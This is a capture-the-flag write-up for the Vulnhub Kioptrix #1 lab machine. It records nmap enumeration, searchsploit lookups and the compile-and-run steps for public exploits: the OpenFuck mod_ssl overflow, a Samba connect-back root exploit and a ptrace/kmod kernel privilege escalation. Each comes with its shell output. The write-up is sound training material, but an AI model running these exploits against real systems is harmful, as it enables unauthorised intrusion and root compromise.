Vulnhub - Kioptrix #1 Writeup
Vulnhub - Kioptrix #1
Enumeration
Nmap
root@kali:~/Desktop/vulnhub/kioptix1# nmap 192.168.56.102 -sC -sV -oA kioptix1
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-08 21:04 IST
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2019-12-08T20:35:42+00:00; +4h59m59s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:9D:2E:BC (Oracle VirtualBox virtual NIC)
Host script results:
|_clock-skew: 4h59m58s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.85 seconds
Lot of outdated services. Lets see what can be exploited.
Searchsploit
root@kali:~# searchsploit mod_ssl 2.8.
------------------------------------------------------------------------------------------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | exploits/unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | exploits/unix/remote/47080.c
------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Result
Lets try the exploit for mod_ssl.
- Compile using
gcc -o OpenFuck OpenFuck.c -lcrypto - Use the appropriate code for the OS. In our case its
0x6b - Run the exploit
Low Privilege Shell
./OpenFuck 0x6b 192.168.56.102 443 -c 50
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
Root shell Method 1 (SMB Exploit)
There is an SMB server running on the machine.
Searchsploit
root@kali:~/Desktop/vulnhub/kioptix1# searchsploit samba 2.2
------------------------------------------------------------------------------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution | exploits/linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | exploits/unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | exploits/linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | exploits/unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | exploits/linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | exploits/multiple/remote/10.c
--------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Result
Compile and run the SMB RCE exploit.
root@kali:~/Desktop/vulnhub/kioptix1# gcc samba.c -o samba.out
root@kali:~/Desktop/vulnhub/kioptix1# ./samba.out
Samba < 2.2.8 Remote Root exploit by Schizoprenic
Connect back method, Xnuxer-Labs, 2003.
Usage : ./samba.out <type> <victim> <your_ip>
Targets:
0 = Linux
1 = FreeBSD/NetBSD
2 = OpenBSD 3.0 and prior
3 = OpenBSD 3.2 - non-exec stack
root@kali:~/Desktop/vulnhub/kioptix1# ./samba.out 0 192.168.56.102 192.168.56.104
[+] Listen on port: 45295
[+] Connecting back to: [192.168.56.104:45295]
[+] Target: Linux
[+] Connected to [192.168.56.102:139]
[+] Please wait in seconds...!
[+] Yeah, I have a root ....!
------------------------------
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
And we are root!.
Root Shell Method 2 (Kernel Exploit)
Searchsploit
root@kali:~/Desktop/vulnhub/kioptix1# searchsploit linux 2.2.x/2.4.x
-------------------------------------------------------------------------------------------------------------------------------------------
Exploit Title
-------------------------------------------------------------------------------------------------------------------------------------------
Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure | exploits/bsd/remote/22131.pl
Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation | exploits/linux/local/3.c
Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure | exploits/linux/local/22813.c
Linux Kernel 2.2.x/2.4.x - I/O System Call File Existence | exploits/linux/local/22458.c
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1) | exploits/linux/local/22362.c
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2) | exploits/linux/local/22363.c
-------------------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Result
We can use a Linux Kernel exploit ‘ptrace/kmod’ Local Privilege Escalation to gain root.
root@kali:~/Desktop/vulnhub/kioptix1# less /usr/share/exploitdb/exploits/linux/local/3.c
/*
* Linux kernel ptrace/kmod local root exploit
*
* This code exploits a race condition in kernel/kmod.c, which creates
* kernel thread in insecure manner. This bug allows to ptrace cloned
* process, allowing to take control over privileged modprobe binary.
*
* Should work under all current 2.2.x and 2.4.x kernels.
*
* I discovered this stupid bug independently on January 25, 2003, that
* is (almost) two month before it was fixed and published by Red Hat
* and others.
*
* Wojciech Purczynski <cliph@isec.pl>
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/
Compile and run to get root.
bash-2.05$ gcc 3.c -o priv_esc.out
gcc 3.c -o priv_esc.out
3.c:185:27: warning: no newline at end of file
bash-2.05$ ./priv_esc.out
./priv_esc.out
[+] Attached to 7189
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
And we are root!.
